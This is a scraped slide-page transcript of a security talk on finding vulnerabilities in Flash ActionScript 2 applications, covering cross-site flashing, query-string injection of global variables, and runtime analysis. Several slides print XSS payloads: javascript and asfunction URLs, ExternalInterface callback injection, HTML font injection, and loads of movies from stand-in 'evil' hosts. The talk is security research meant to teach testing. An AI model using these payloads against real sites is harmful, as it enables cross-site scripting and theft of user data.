html5-img
1 / 36

Finding Vulnerabilities in Flash Applications

Finding Vulnerabilities in Flash Applications. Stefano Di Paola CTO MindedSecurity stefano.dipaola@mindedsecurity.com +393209495590. Stefano Di Paola: CTO & Co-Founder Minded Security Security Engineer & Researcher Web App Pen Tester Code Review and Forensic

storm
Télécharger la présentation

Finding Vulnerabilities in Flash Applications

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Finding Vulnerabilities in Flash Applications Stefano Di Paola CTO MindedSecurity stefano.dipaola@mindedsecurity.com +393209495590

  2. Stefano Di Paola: CTO & Co-Founder Minded Security Security Engineer & Researcher Web App Pen Tester Code Review and Forensic Vulnerabilities (Pdf UXSS & Others) Owasp Italy R&D Director $ Whoami^J 2

  3. Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 3

  4. Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 4

  5. Objectives • Focus on Flash ActionScript 2 Applications Security • Understand the attack flow • Dead Code Analysis Methodology • Runtime Analysis Methodology 5

  6. Flash Apps - Security Concerns • Can execute JavaScript when embedded in a HTML page and viewed from inside a Browser. • Can forge binary requests and Http Requests. • Can execute external Flash Movies. • Can play Audio/Video files natively. • Can display minimal Html code inside a TextField.

  7. Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 7

  8. SWF Client Side Attacks • This new attack vector was presented @ Owasp 2007 Appsec Conference in Milan, Italy • Relies on flawed SWF files and not on SWF parser • A flawed SWF is a SWF which could allow • classical XSS • Cross Site Flashing (the dark side of cross movie scripting) 8

  9. Cross Site Flashing (XSF) XSF Occurs when from different domains: One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it XSF could also occurs when an HTML page uses *Script to script a Macromedia Flash movie, for example, by calling: GetVariable: access to flash public and static object from javascript as a string. SetVariable: set a static or public flash object to a new string value from javascript. Unexpected Browser to swf communication could result in stealing data from swf application 9

  10. Accomplishing an Attack using flawed SWF • When a link to a flawed swf is directly pasted to the location bar every browser automatically generate some Html with Object and/or Embed tags: <html><body marginwidth="0" marginheight="0"><embed width="100%" height="100%" name="plugin" src="http://Url/To/Swf" type="application/x-shockwave-flash"/></body></html>

  11. Attack Example to a Flawed SWF • A flawed Swf was uploaded to vi.ct.im Host. • Contains the following code • Let's see what an attacker could do with a browser (Video) v1.loadv = function () { this.varTarget = new MovieClip(); _root.createEmptyMovieClip('varTarget', 10); var v2 = new XML(); v2.load(_root.test); };

  12. Accomplish an attack • So clicking and redirecting to a swf will let the browser execute it on the main window. • Works with every browser. • IE7 needs: • Iframe 'src' could be used too. • Tested on Firefox • SWF/Browser interaction doesn't works on IE7 using javascript:. • We'll see when it work even with IE7 try{code}catch(e){location.reload()}

  13. The Attack Flow We will see the dangerous mechanisms that could lead to Client Side Attacks • URL QueryString • Global Uninitialized Variables • flashVars • External Movies • Remote XML files • MP3 and Flv Movies • Embedded Html

  14. Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis

  15. Register Globals in ActionScript • Similar to PHP Register Globals • Every uninitialized variable with global scope is a potential threat: • _root.* • _global.* • _level0.* • .* • It is easy to add it as a parameter in the query string: http://URL?language=http://evil if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; } v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');

  16. Register Globals in Included Files 1/2 Assumptions made for _leveln movies are wrong when a movie supposed to be at level1 is loaded as _level0 _level(n-1).* /* Level0 Movie */ _level0.DEMO_PATH = getHost(this._url); loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf', (_level0.demo_level + 1)); .... /* Level1 Movie 'upperlev.swf' */ .... loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......

  17. Register Globals in Included Files 2/2 Then let's load upperlev.swf and then use query string to initialize DEMO_PATH: http://host/upperlev.swf?DEMO_PATH=http://evil /* Level1 Movie 'upperlev.swf' */ .... loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......

  18. Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis Static Analysis

  19. Attack Patterns – Quick Reference • Some Attack patterns where already described in: • Testing Flash Applications • http://www.wisec.it/docs.php?id=5 • A quick reference of attack patterns which trigger XSS in SWF: • asfunction:getURL,javascript:alert('XSS') • javascript:alert('XSS') • <img src='javascript:alert(“XSS”)//.jpg'> • http://evil.ltd/evilversion7.swf

  20. Attack Patterns – Quick Reference A quick reference of PDNF and Objects where attack pattern could be injected: getURL load*(URL,..) Functions loadVariables(url, level ) LoadMovie ( url, target ) LoadMovieNum( url, level ) XML.load ( url ) LoadVars.load ( url ) Sound.loadSound( url , isStreaming ); NetStream.play( url ); TextField.htmlText

  21. Attack Patterns – GetURL New Issue • The GET issue^N^N^N^N^Nfeature: From Adobe: “..The GET method appends the variables to the end of the URL, and is used for small numbers of variables..” if a swf contains the above, a request like becomes: Credits go to SirDarckCat and Kuza55 who found it getURL('javascript:SomeFunc(“someValue”)','','GET') http://victim/noundef.swf?a=0:0;alert('XSS') javascript:SomeFunc(“someValue”)?a=0:0;alert(123)

  22. Attack Patterns – ExternalInterface New Issue • flash.external.ExternalInterface.call syntax Actually, methodName could be any Javascript code, infact when call('method123') is executed, a js function is called (www.develotec.com/flash8api.txt): public static call(methodName:String, [parameter1:Object]) try { __flash__toXML(method123()) ; } catch (e) { "<undefined/>"; }

  23. External Interface Attack • What happens if a swf contains: http://host/swf?callback=(new Function(“alert(‘Xss’)”)) • Works with Iframe and IE7 too flash.external.ExternalInterface.call(_root.callback) __flash__toXML((new Function(“alert(‘Xss’)”))())

  24. Attack Patterns – Font New Issue • A code like • Rewrites ‘something’ to <p font=“TIMES”>something</p> • That could be exploited by injecting: • fontFamily = '”><img src=”http://evil/evil.swf”><”' createTextField("txt", 999, 10, 10, 320, 240); txt.html=true; var _tf:TextFormat = new TextFormat(); _tf.font = _root.fontFamily; txt.setTextFormat( _tf ); txt.htmlText='something';

  25. Modify the Data Flow 1/4 • Multiple classes and packages are often used to separate functionalities. • In Flash every class/package like • is compiled in the following way: class simpleClass{} push 'simpleClass' getVariable not not branchIfTrue label1 ... label1 end

  26. Modify the Data Flow 2/4 • Decompiled by flare, results in: • So simpleClass is a _global attribute. • This means that it's initially undefined. • So it can be instantiated with a string value from the query string if (!simpleClass) { _global.simpleClass = function () {}; ... }

  27. Modify the Data Flow 3/4 Supposing there is a class like: class simpleUtils { static public function testForSomething(){ if(ok) return true; else return false; } ... class simpleClass { static function main(){ if(!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")'); else getURL('javascript:alert("ok!")'); } ...

  28. Modify the Data Flow 4/4 • Sending the request: http://host/swf.swf?simpleUtils=blah • sets the object simpleUtils to an instantiated string, so: simpleUtils.testForSomething() becomes undefined and the flow is modified. if(!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")'); else getURL('javascript:alert("ok!")');

  29. Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 29

  30. Recipe for Runtime Analysis A method to find uninitialized variables A SWF Container which loads the external one One array of attack patterns A framework to mix our ingredients

  31. Find Undefined Vars @ Runtime • Definition of __resolve: • from Adobe: “a reference to a user-defined function that is invoked if ActionScript code refers to an undefined property or method. If ActionScript code refers to an undefined property or method of an object, Flash Player determines whether the object's __resolve property is defined.” • As we need to find _root.* or _global.* undefined variables: _root.__resolve = function (name){ // name is undefined }

  32. Attack Patterns Array From our knowledge base an attack Array will contain the following elements: Direct load asfunction: getURL,javascript:gotRoot("")///d.jpg Controlled Evil Page/Host: http://at.tack.er/evil.swf Flash Html Injection: “'><img src='asfunction:getURL,javascript:gotRoot(“”)//.jpg' > Dom Injection: (gotRoot('')) Js/Flash Error: “'|!$%&/)=

  33. A SWF Container The swf to be analyzed is closed, so we need a wrapper which shares _root and _global variables The wrapper will contain __resolve methods for _root and _globals. var image_mcl = new MovieClipLoader(); image_mcl.addListener(mclListener); _root._lockroot=true image_mcl.loadClip( _root.swfurl+"?"+ _root.varToSend, _root.varTarget);

  34. A framework: SWFRTAnalyzer

  35. Conclusions • A free version of the SWF Runtime Analyser will be released by Minded Security. • Awareness about ActionScript security is growing but is still a drop in the ocean. • There is still a lot of research to do about Actionscript security.

  36. Thank you :) Questions? Web: http://www.mindedsecurity.com Weblog: http://www.wisec.it Email: stefano.dipaola_at_mindedsecurity.com

More Related